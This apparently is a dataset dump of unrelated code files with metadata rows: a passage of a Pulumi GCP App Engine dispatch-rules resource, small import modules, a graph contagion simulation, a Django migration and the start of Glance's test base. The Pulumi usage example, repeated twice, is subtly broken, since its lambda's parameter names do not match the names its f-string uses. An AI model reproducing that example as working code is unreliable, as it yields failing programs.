def project(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "project", value)
@pulumi.input_type
class _ApplicationUrlDispatchRulesState:
def __init__(__self__, *,
dispatch_rules: Optional[pulumi.Input[Sequence[pulumi.Input['ApplicationUrlDispatchRulesDispatchRuleArgs']]]] = None,
project: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering ApplicationUrlDispatchRules resources.
:param pulumi.Input[Sequence[pulumi.Input['ApplicationUrlDispatchRulesDispatchRuleArgs']]] dispatch_rules: Rules to match an HTTP request and dispatch that request to a service.
Structure is documented below.
:param pulumi.Input[str] project: The ID of the project in which the resource belongs.
If it is not provided, the provider project is used.
"""
if dispatch_rules is not None:
pulumi.set(__self__, "dispatch_rules", dispatch_rules)
if project is not None:
pulumi.set(__self__, "project", project)
@property
@pulumi.getter(name="dispatchRules")
def dispatch_rules(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ApplicationUrlDispatchRulesDispatchRuleArgs']]]]:
"""
Rules to match an HTTP request and dispatch that request to a service.
Structure is documented below.
"""
return pulumi.get(self, "dispatch_rules")
@dispatch_rules.setter
def dispatch_rules(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['ApplicationUrlDispatchRulesDispatchRuleArgs']]]]):
pulumi.set(self, "dispatch_rules", value)
@property
@pulumi.getter
def project(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the project in which the resource belongs.
If it is not provided, the provider project is used.
"""
return pulumi.get(self, "project")
@project.setter
def project(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "project", value)
class ApplicationUrlDispatchRules(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
dispatch_rules: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ApplicationUrlDispatchRulesDispatchRuleArgs']]]]] = None,
project: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Rules to match an HTTP request and dispatch that request to a service.
To get more information about ApplicationUrlDispatchRules, see:
* [API documentation](https://cloud.google.com/appengine/docs/admin-api/reference/rest/v1/apps#UrlDispatchRule)
## Example Usage
### App Engine Application Url Dispatch Rules Basic
```python
import pulumi
import pulumi_gcp as gcp
bucket = gcp.storage.Bucket("bucket")
object = gcp.storage.BucketObject("object",
bucket=bucket.name,
source=pulumi.FileAsset("./test-fixtures/appengine/hello-world.zip"))
admin_v3 = gcp.appengine.StandardAppVersion("adminV3",
version_id="v3",
service="admin",
runtime="nodejs10",
entrypoint=gcp.appengine.StandardAppVersionEntrypointArgs(
shell="node ./app.js",
),
deployment=gcp.appengine.StandardAppVersionDeploymentArgs(
zip=gcp.appengine.StandardAppVersionDeploymentZipArgs(
source_url=pulumi.Output.all(bucket.name, object.name).apply(lambda bucketName, objectName: f"https://storage.googleapis.com/{bucket_name}/{object_name}"),
),
),
env_variables={
"port": "8080",
},
noop_on_destroy=True)
web_service = gcp.appengine.ApplicationUrlDispatchRules("webService", dispatch_rules=[
gcp.appengine.ApplicationUrlDispatchRulesDispatchRuleArgs(
domain="*",
path="/*",
service="default",
),
gcp.appengine.ApplicationUrlDispatchRulesDispatchRuleArgs(
domain="*",
path="/admin/*",
service=admin_v3.service,
),
])
```
## Import
ApplicationUrlDispatchRules can be imported using any of these accepted formats
```sh
$ pulumi import gcp:appengine/applicationUrlDispatchRules:ApplicationUrlDispatchRules default {{project}}
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ApplicationUrlDispatchRulesDispatchRuleArgs']]]] dispatch_rules: Rules to match an HTTP request and dispatch that request to a service.
Structure is documented below.
:param pulumi.Input[str] project: The ID of the project in which the resource belongs.
If it is not provided, the provider project is used.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: ApplicationUrlDispatchRulesArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Rules to match an HTTP request and dispatch that request to a service.
To get more information about ApplicationUrlDispatchRules, see:
* [API documentation](https://cloud.google.com/appengine/docs/admin-api/reference/rest/v1/apps#UrlDispatchRule)
## Example Usage
### App Engine Application Url Dispatch Rules Basic
```python
import pulumi
import pulumi_gcp as gcp
bucket = gcp.storage.Bucket("bucket")
object = gcp.storage.BucketObject("object",
bucket=bucket.name,
source=pulumi.FileAsset("./test-fixtures/appengine/hello-world.zip"))
admin_v3 = gcp.appengine.StandardAppVersion("adminV3",
version_id="v3",
service="admin",
runtime="nodejs10",
entrypoint=gcp.appengine.StandardAppVersionEntrypointArgs(
shell="node ./app.js",
),
deployment=gcp.appengine.StandardAppVersionDeploymentArgs(
zip=gcp.appengine.StandardAppVersionDeploymentZipArgs(
source_url=pulumi.Output.all(bucket.name, object.name).apply(lambda bucketName, objectName: f"https://storage.googleapis.com/{bucket_name}/{object_name}"),
),
),
env_variables={
"port": "8080",
},
noop_on_destroy=True)
web_service = gcp.appengine.ApplicationUrlDispatchRules("webService", dispatch_rules=[
gcp.appengine.ApplicationUrlDispatchRulesDispatchRuleArgs(
domain="*",
path="/*",
service="default",
),
gcp.appengine.ApplicationUrlDispatchRulesDispatchRuleArgs(
domain="*",
path="/admin/*",
service=admin_v3.service,
),
])
```
## Import
ApplicationUrlDispatchRules can be imported using any of these accepted formats
```sh
$ pulumi import gcp:appengine/applicationUrlDispatchRules:ApplicationUrlDispatchRules default {{project}}
```
:param str resource_name: The name of the resource.
:param ApplicationUrlDispatchRulesArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(ApplicationUrlDispatchRulesArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
dispatch_rules: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ApplicationUrlDispatchRulesDispatchRuleArgs']]]]] = None,
project: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = ApplicationUrlDispatchRulesArgs.__new__(ApplicationUrlDispatchRulesArgs)
if dispatch_rules is None and not opts.urn:
raise TypeError("Missing required property 'dispatch_rules'")
__props__.__dict__["dispatch_rules"] = dispatch_rules
__props__.__dict__["project"] = project
super(ApplicationUrlDispatchRules, __self__).__init__(
'gcp:appengine/applicationUrlDispatchRules:ApplicationUrlDispatchRules',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
dispatch_rules: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ApplicationUrlDispatchRulesDispatchRuleArgs']]]]] = None,
project: Optional[pulumi.Input[str]] = None) -> 'ApplicationUrlDispatchRules':
"""
Get an existing ApplicationUrlDispatchRules resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ApplicationUrlDispatchRulesDispatchRuleArgs']]]] dispatch_rules: Rules to match an HTTP request and dispatch that request to a service.
Structure is documented below.
:param pulumi.Input[str] project: The ID of the project in which the resource belongs.
If it is not provided, the provider project is used.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _ApplicationUrlDispatchRulesState.__new__(_ApplicationUrlDispatchRulesState)
__props__.__dict__["dispatch_rules"] = dispatch_rules
__props__.__dict__["project"] = project
return ApplicationUrlDispatchRules(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="dispatchRules")
def dispatch_rules(self) -> pulumi.Output[Sequence['outputs.ApplicationUrlDispatchRulesDispatchRule']]:
"""
Rules to match an HTTP request and dispatch that request to a service.
Structure is documented below.
"""
return pulumi.get(self, "dispatch_rules")
@property
@pulumi.getter
def project(self) -> pulumi.Output[str]:
"""
The ID of the project in which the resource belongs.
If it is not provided, the provider project is used.
"""
return pulumi.get(self, "project")
| 44.503145 | 203 | 0.652841 | 1,413 | 14,152 | 6.361642 | 0.155697 | 0.05262 | 0.031705 | 0.036155 | 0.767382 | 0.751029 | 0.734453 | 0.722995 | 0.702748 | 0.702748 | 0 | 0.002184 | 0.256006 | 14,152 | 317 | 204 | 44.643533 | 0.851553 | 0.469828 | 0 | 0.550847 | 1 | 0 | 0.161676 | 0.09366 | 0 | 0 | 0 | 0 | 0 | 1 | 0.144068 | false | 0.008475 | 0.059322 | 0 | 0.288136 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
bcd2e0d8ff9e17bfff42d10d00839a8c6eba93bf | 44 | py | Python | cygraphblas/lib/descriptor/ss.py | eriknw/cygraphblas | 81ae37591ec38aa698d5f37716464a6c366076f9 | [
"Apache-2.0"
] | 3 | 2020-09-03T21:47:25.000Z | 2021-08-06T20:24:19.000Z | cygraphblas/lib/descriptor/ss.py | eriknw/cygraphblas | 81ae37591ec38aa698d5f37716464a6c366076f9 | [
"Apache-2.0"
] | null | null | null | cygraphblas/lib/descriptor/ss.py | eriknw/cygraphblas | 81ae37591ec38aa698d5f37716464a6c366076f9 | [
"Apache-2.0"
] | 2 | 2020-09-03T21:47:52.000Z | 2021-08-06T20:24:20.000Z | from cygraphblas_ss.lib.descriptor import *
| 22 | 43 | 0.840909 | 6 | 44 | 6 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.090909 | 44 | 1 | 44 | 44 | 0.9 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
bcec87ae36d9ffee5a73337cdd50ec825c8b6eed | 27 | py | Python | handlers/admin/__init__.py | vR4eslav/DatingBot | 62f9ccbe1a3d0c65dd8d650400a1b5595be893b5 | [
"Apache-2.0"
] | null | null | null | handlers/admin/__init__.py | vR4eslav/DatingBot | 62f9ccbe1a3d0c65dd8d650400a1b5595be893b5 | [
"Apache-2.0"
] | null | null | null | handlers/admin/__init__.py | vR4eslav/DatingBot | 62f9ccbe1a3d0c65dd8d650400a1b5595be893b5 | [
"Apache-2.0"
] | null | null | null | from . import admin_handler | 27 | 27 | 0.851852 | 4 | 27 | 5.5 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.111111 | 27 | 1 | 27 | 27 | 0.916667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
4c18903a2bfdee92d45c203367ca98e0f9c65dfe | 11,347 | py | Python | plot_barabasi2.py | koshini/polya-social-contagion | ad3915a59611589160e5c7f5e6a1d82489e6e1b2 | [
"MIT"
] | null | null | null | plot_barabasi2.py | koshini/polya-social-contagion | ad3915a59611589160e5c7f5e6a1d82489e6e1b2 | [
"MIT"
] | 1 | 2019-04-03T20:45:05.000Z | 2019-04-07T18:06:13.000Z | plot_barabasi2.py | koshini/polya-social-contagion | ad3915a59611589160e5c7f5e6a1d82489e6e1b2 | [
"MIT"
] | null | null | null | import networkx as nx
from graph_generator import generate_graph
from simulation import simulate
import time
import matplotlib.pyplot as plt
import numpy as np
runs = 200
node_count = 25
iterations = 300
initial_balls = node_count * 100
topology = 'barabasi'
def main():
folder = 'neutral-equal-25/'
red_mult = 1
black_mult = 1
red_budget = node_count * 10
black_budget = node_count * 10
run_scenario(folder, red_mult, black_mult, red_budget, black_budget)
folder = 'neutral-more-red/'
red_mult = 1
black_mult = 1
red_budget = node_count * 10
black_budget = node_count * 7
# run_scenario(folder, red_mult, black_mult, red_budget, black_budget)
folder = 'pre-infected-equal-25/'
red_mult = 2
black_mult = 1
red_budget = node_count * 10
black_budget = node_count * 10
run_scenario(folder, red_mult, black_mult, red_budget, black_budget)
folder = 'pre-cured-equal-25/'
red_mult = 1
black_mult = 2
red_budget = node_count * 10
black_budget = node_count * 10
run_scenario(folder, red_mult, black_mult, red_budget, black_budget)
folder = 'pre-cured-more-red/'
red_mult = 1
black_mult = 2
red_budget = node_count * 10
black_budget = node_count * 7
# run_scenario(folder, red_mult, black_mult, red_budget, black_budget)
def run_scenario(folder, red_mult, black_mult, red_budget, black_budget):
initial_condition = {
'node_count': node_count,
'parameter': 2,
'red': initial_balls * red_mult,
'black': initial_balls * black_mult,
'dist': 'random'
}
print('-------------' + folder)
strat_dict_list = []
strat_dict_list.append({
'red_budget': red_budget,
'black_budget': black_budget,
'red_strat': 'bot',
'black_strat': 'gradient',
})
strat_dict_list.append({
'red_budget': red_budget,
'black_budget': black_budget,
'red_strat': 'bot',
'black_strat': 'pure_centrality_threshold',
})
strat_dict_list.append({
'red_budget': red_budget,
'black_budget': black_budget,
'red_strat': 'bot',
'black_strat': 'centrality_threshold',
'threshold': 0.4,
'portion': 0.05
})
strat_dict_list.append({
'red_budget': red_budget,
'black_budget': black_budget,
'red_strat': 'bot',
'black_strat': 'pure_centrality',
})
strat_dict_list.append({
'red_budget': red_budget,
'black_budget': black_budget,
'red_strat': 'bot',
'black_strat': 'follow_bot',
})
run_strats(folder, topology, red_mult, black_mult, strat_dict_list, iterations, runs, initial_condition)
make_plots(folder, topology, strat_dict_list, 'all-strats')
###############################
strat_dict_list = []
strat_dict_list.append({
'red_budget': red_budget,
'black_budget': black_budget,
'red_strat': 'bot',
'black_strat': 'centrality_threshold',
'threshold': 0.2,
'portion': 0.01
})
strat_dict_list.append({
'red_budget': red_budget,
'black_budget': black_budget,
'red_strat': 'bot',
'black_strat': 'centrality_threshold',
'threshold': 0.2,
'portion': 0.05
})
strat_dict_list.append({
'red_budget': red_budget,
'black_budget': black_budget,
'red_strat': 'bot',
'black_strat': 'centrality_threshold',
'threshold': 0.2,
'portion': 0.1
})
# run_strats(folder, topology, red_mult, black_mult, strat_dict_list, iterations, runs, initial_condition)
# make_plots(folder, topology, strat_dict_list, '0.2vary-portion')
###############################
###############################
strat_dict_list = []
strat_dict_list.append({
'red_budget': red_budget,
'black_budget': black_budget,
'red_strat': 'bot',
'black_strat': 'centrality_threshold',
'threshold': 0.4,
'portion': 0.01
})
strat_dict_list.append({
'red_budget': red_budget,
'black_budget': black_budget,
'red_strat': 'bot',
'black_strat': 'centrality_threshold',
'threshold': 0.4,
'portion': 0.05
})
strat_dict_list.append({
'red_budget': red_budget,
'black_budget': black_budget,
'red_strat': 'bot',
'black_strat': 'centrality_threshold',
'threshold': 0.4,
'portion': 0.1
})
# run_strats(folder, topology, red_mult, black_mult, strat_dict_list, iterations, runs, initial_condition)
# make_plots(folder, topology, strat_dict_list, '0.4vary-portion')
###############################
strat_dict_list = []
strat_dict_list.append({
'red_budget': red_budget,
'black_budget': black_budget,
'red_strat': 'bot',
'black_strat': 'centrality_threshold',
'threshold': 0.6,
'portion': 0.01
})
strat_dict_list.append({
'red_budget': red_budget,
'black_budget': black_budget,
'red_strat': 'bot',
'black_strat': 'centrality_threshold',
'threshold': 0.6,
'portion': 0.05
})
strat_dict_list.append({
'red_budget': red_budget,
'black_budget': black_budget,
'red_strat': 'bot',
'black_strat': 'centrality_threshold',
'threshold': 0.6,
'portion': 0.1
})
# run_strats(folder, topology, red_mult, black_mult, strat_dict_list, iterations, runs, initial_condition)
# make_plots(folder, topology, strat_dict_list, '0.6vary-portion')
###############################
strat_dict_list = []
strat_dict_list.append({
'red_budget': red_budget,
'black_budget': black_budget,
'red_strat': 'bot',
'black_strat': 'pure_centrality',
})
strat_dict_list.append({
'red_budget': red_budget,
'black_budget': black_budget,
'red_strat': 'bot',
'black_strat': 'pure_degree',
})
strat_dict_list.append({
'red_budget': red_budget,
'black_budget': black_budget,
'red_strat': 'bot',
'black_strat': 'pure_closeness',
})
strat_dict_list.append({
'red_budget': red_budget,
'black_budget': black_budget,
'red_strat': 'bot',
'black_strat': 'pure_exposure',
})
# run_strats(folder, topology, red_mult, black_mult, strat_dict_list, iterations, runs, initial_condition)
#### Plot exposure-degree-closeness
strat_dict_list = []
strat_dict_list.append({
'red_budget': red_budget,
'black_budget': black_budget,
'red_strat': 'bot',
'black_strat': 'pure_exposure',
})
strat_dict_list.append({
'red_budget': red_budget,
'black_budget': black_budget,
'red_strat': 'bot',
'black_strat': 'pure_degree',
})
strat_dict_list.append({
'red_budget': red_budget,
'black_budget': black_budget,
'red_strat': 'bot',
'black_strat': 'pure_closeness',
})
# make_plots(folder, topology, strat_dict_list, 'exposure-degree-closeness')
#### Plot centrality-degree-closeness
strat_dict_list = []
strat_dict_list.append({
'red_budget': red_budget,
'black_budget': black_budget,
'red_strat': 'bot',
'black_strat': 'pure_centrality',
})
strat_dict_list.append({
'red_budget': red_budget,
'black_budget': black_budget,
'red_strat': 'bot',
'black_strat': 'pure_degree',
})
strat_dict_list.append({
'red_budget': red_budget,
'black_budget': black_budget,
'red_strat': 'bot',
'black_strat': 'pure_closeness',
})
# make_plots(folder, topology, strat_dict_list, 'centrality-degree-closeness')
############################### gradient nash equilibrium
strat_dict_list = []
strat_dict_list.append({
'red_budget': red_budget,
'black_budget': black_budget,
'red_strat': 'uniform',
'black_strat': 'gradient',
})
strat_dict_list.append({
'red_budget': red_budget,
'black_budget': black_budget,
'red_strat': 'gradient',
'black_strat': 'gradient',
})
strat_dict_list.append({
'red_budget': red_budget,
'black_budget': black_budget,
'red_strat': 'gradient',
'black_strat': 'uniform',
})
#
# run_strats(folder, topology, red_mult, black_mult, strat_dict_list, iterations, runs, initial_condition)
# make_plots(folder, topology, strat_dict_list, 'gradient-nash-equil')
def run_strats(folder, topology, red_mult, black_mult, strat_list, iterations, runs, initial_condition):
for strat in strat_list:
print(str(strat))
start = time.time()
prefix = ''
if strat.get('threshold') is not None:
prefix = str(strat['threshold']) + '_' + str(strat['portion'])
infection_csv = folder + topology + prefix + strat['red_strat'] + strat[
'black_strat'] + 'infection.csv'
simulate(folder, topology, red_mult, black_mult, strat, iterations, runs, prefix=prefix, initial_condition=initial_condition)
elapsed_time = time.time() - start
print(elapsed_time)
print()
log_file = folder + 'log.txt'
with open(log_file, 'a') as f:
f.write(str(strat) + '\n')
f.write(str(elapsed_time) + '\n')
f.write('\n')
def make_plots(folder, topology, strat_dict_list, plot_name):
plt.figure()
for strat_dict in strat_dict_list:
if topology == 'twitter':
iterations = 60
else:
iterations = 300
prefix = ''
red_strat = strat_dict['red_strat'].replace('_', ' ')
black_strat = strat_dict['black_strat'].replace('_', ' ')
if black_strat == 'centrality threshold':
black_strat = 'adjusted centrality exposure threshold'
if black_strat == 'pure centrality threshold':
black_strat = 'centrality exposure threshold'
infection_csv = folder + '/empirical-infection' + topology + strat_dict['red_strat'] + strat_dict[
'black_strat'] + 'infection.csv'
if strat_dict.get('threshold') is not None:
prefix = str(strat_dict['threshold']) + '_' + str(strat_dict['portion'])
if prefix:
infection_csv = folder + topology + prefix + strat_dict['red_strat'] + strat_dict[
'black_strat'] + 'infection.csv'
infection_array = np.loadtxt(infection_csv, delimiter=',', unpack=True)
# infection_array = np.insert(infection_array, 0, 0.2, axis=1)
avg_infection = np.mean(infection_array, axis=1)
plt.xlabel('Time step')
plt.ylabel('Average infection rate')
# avg_infection = infection_array # if there is only one row
plt.plot(list(range(avg_infection.size)), avg_infection, label=prefix + black_strat)
plt.legend(loc='best', prop={'size': 10})
plt.axis([0, iterations, 0.2, 0.8])
filename = folder + topology + plot_name + '.png'
plt.savefig(filename)
# plt.show()
plt.close()
if __name__ == "__main__":
main() | 29.704188 | 133 | 0.602979 | 1,308 | 11,347 | 4.881498 | 0.110092 | 0.091621 | 0.159749 | 0.103367 | 0.74675 | 0.731088 | 0.720282 | 0.704777 | 0.693814 | 0.686922 | 0 | 0.013716 | 0.254693 | 11,347 | 382 | 134 | 29.704188 | 0.741279 | 0.114391 | 0 | 0.736301 | 1 | 0 | 0.238182 | 0.004778 | 0 | 0 | 0 | 0 | 0 | 1 | 0.013699 | false | 0 | 0.020548 | 0 | 0.034247 | 0.013699 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
4c5e41c46a8f658f19b9b4bade40c9d14d0dc499 | 2,264 | py | Python | app/profiles/migrations/0001_initial.py | GaneshPandey/cowmandu | de6c110087d7b0d8ad54dafec0af3d2ab09532e3 | [
"MIT"
] | null | null | null | app/profiles/migrations/0001_initial.py | GaneshPandey/cowmandu | de6c110087d7b0d8ad54dafec0af3d2ab09532e3 | [
"MIT"
] | null | null | null | app/profiles/migrations/0001_initial.py | GaneshPandey/cowmandu | de6c110087d7b0d8ad54dafec0af3d2ab09532e3 | [
"MIT"
] | null | null | null | # Generated by Django 2.2.6 on 2019-10-15 09:09
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='ManagerProfile',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('date_of_birth', models.DateField(blank=True, null=True)),
('phone_no', models.CharField(max_length=10)),
('profile_photo', models.ImageField(blank=True, default='profile/profile_default.png', upload_to='profile')),
('cover_photo', models.ImageField(blank=True, default='profile/cover-image/cover_default.jpg', upload_to='profile/cover-image')),
('gender', models.CharField(choices=[('male', 'Male'), ('female', 'Female'), ('other', 'Other')], default='other', max_length=6)),
('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, related_name='manager_profile', to=settings.AUTH_USER_MODEL, verbose_name='user')),
],
),
migrations.CreateModel(
name='CustomerProfile',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('date_of_birth', models.DateField(blank=True, null=True)),
('phone_no', models.CharField(max_length=10)),
('profile_photo', models.ImageField(blank=True, default='profile/profile_default.png', upload_to='profile')),
('cover_photo', models.ImageField(blank=True, default='profile/cover-image/cover_default.jpg', upload_to='profile/cover-image')),
('gender', models.CharField(choices=[('male', 'Male'), ('female', 'Female'), ('other', 'Other')], default='other', max_length=6)),
('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, related_name='customer_profile', to=settings.AUTH_USER_MODEL, verbose_name='user')),
],
),
]
| 53.904762 | 175 | 0.637367 | 251 | 2,264 | 5.577689 | 0.298805 | 0.038571 | 0.06 | 0.074286 | 0.761429 | 0.761429 | 0.761429 | 0.761429 | 0.761429 | 0.697143 | 0 | 0.011699 | 0.207155 | 2,264 | 41 | 176 | 55.219512 | 0.768245 | 0.019876 | 0 | 0.588235 | 1 | 0 | 0.196662 | 0.057736 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.088235 | 0 | 0.205882 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
d5be471e8b5fd679ea92f1e068d20e864af22d4a | 20 | py | Python | ml4s/__init__.py | agdelma/ml4s | b3e9dc6b5ffe9d01399e56fd73c6792fe6d57f50 | [
"MIT"
] | null | null | null | ml4s/__init__.py | agdelma/ml4s | b3e9dc6b5ffe9d01399e56fd73c6792fe6d57f50 | [
"MIT"
] | null | null | null | ml4s/__init__.py | agdelma/ml4s | b3e9dc6b5ffe9d01399e56fd73c6792fe6d57f50 | [
"MIT"
] | null | null | null | from .ml4s import *
| 10 | 19 | 0.7 | 3 | 20 | 4.666667 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.0625 | 0.2 | 20 | 1 | 20 | 20 | 0.8125 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
d5fc1d766f3b2eea9ec851e2c3b9decdd566421f | 282 | py | Python | bentoml/pytorch.py | francoisserra/BentoML | 213e9e9b39e055286f2649c733907df88e6d2503 | [
"Apache-2.0"
] | 1 | 2021-06-12T17:04:07.000Z | 2021-06-12T17:04:07.000Z | bentoml/pytorch.py | francoisserra/BentoML | 213e9e9b39e055286f2649c733907df88e6d2503 | [
"Apache-2.0"
] | 4 | 2021-05-16T08:06:25.000Z | 2021-11-13T08:46:36.000Z | bentoml/pytorch.py | francoisserra/BentoML | 213e9e9b39e055286f2649c733907df88e6d2503 | [
"Apache-2.0"
] | null | null | null | from ._internal.frameworks.pytorch import load
from ._internal.frameworks.pytorch import save
from ._internal.frameworks.pytorch import load_runner
from ._internal.frameworks.pytorch import PytorchTensorContainer
__all__ = ["PytorchTensorContainer", "load", "load_runner", "save"]
| 40.285714 | 67 | 0.826241 | 31 | 282 | 7.193548 | 0.322581 | 0.215247 | 0.394619 | 0.520179 | 0.663677 | 0.349776 | 0 | 0 | 0 | 0 | 0 | 0 | 0.08156 | 282 | 6 | 68 | 47 | 0.861004 | 0 | 0 | 0 | 0 | 0 | 0.14539 | 0.078014 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.8 | 0 | 0.8 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
914d35157b06e84c8c90e46522258e57f5e9885c | 63,287 | py | Python | glance/tests/functional/__init__.py | rajivmucheli/glance | 73742be99944d923031aa5f90e06051126b17007 | [
"Apache-2.0"
] | null | null | null | glance/tests/functional/__init__.py | rajivmucheli/glance | 73742be99944d923031aa5f90e06051126b17007 | [
"Apache-2.0"
] | null | null | null | glance/tests/functional/__init__.py | rajivmucheli/glance | 73742be99944d923031aa5f90e06051126b17007 | [
"Apache-2.0"
] | null | null | null | # Copyright 2011 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Base test class for running non-stubbed tests (functional tests)
The FunctionalTest class contains helper methods for starting the API
and Registry server, grabbing the logs of each, cleaning up pidfiles,
and spinning down the servers.
"""
import abc
import atexit
import datetime
import errno
import os
import platform
import shutil
import signal
import six
import socket
import subprocess
import sys
import tempfile
import textwrap
import time
from unittest import mock
import uuid
import fixtures
import glance_store
from os_win import utilsfactory as os_win_utilsfactory
from oslo_config import cfg
from oslo_serialization import jsonutils
# NOTE(jokke): simplified transition to py3, behaves like py2 xrange
from six.moves import range
import six.moves.urllib.parse as urlparse
import testtools
import webob
from glance.common import config
from glance.common import utils
from glance.common import wsgi
from glance.db.sqlalchemy import api as db_api
from glance import tests as glance_tests
from glance.tests import utils as test_utils
execute, get_unused_port = test_utils.execute, test_utils.get_unused_port
tracecmd_osmap = {'Linux': 'strace', 'FreeBSD': 'truss'}
if os.name == 'nt':
SQLITE_CONN_TEMPLATE = 'sqlite:///%s/tests.sqlite'
else:
SQLITE_CONN_TEMPLATE = 'sqlite:////%s/tests.sqlite'
CONF = cfg.CONF
import glance.async_
# NOTE(danms): Default to eventlet threading for tests
try:
glance.async_.set_threadpool_model('eventlet')
except RuntimeError:
pass
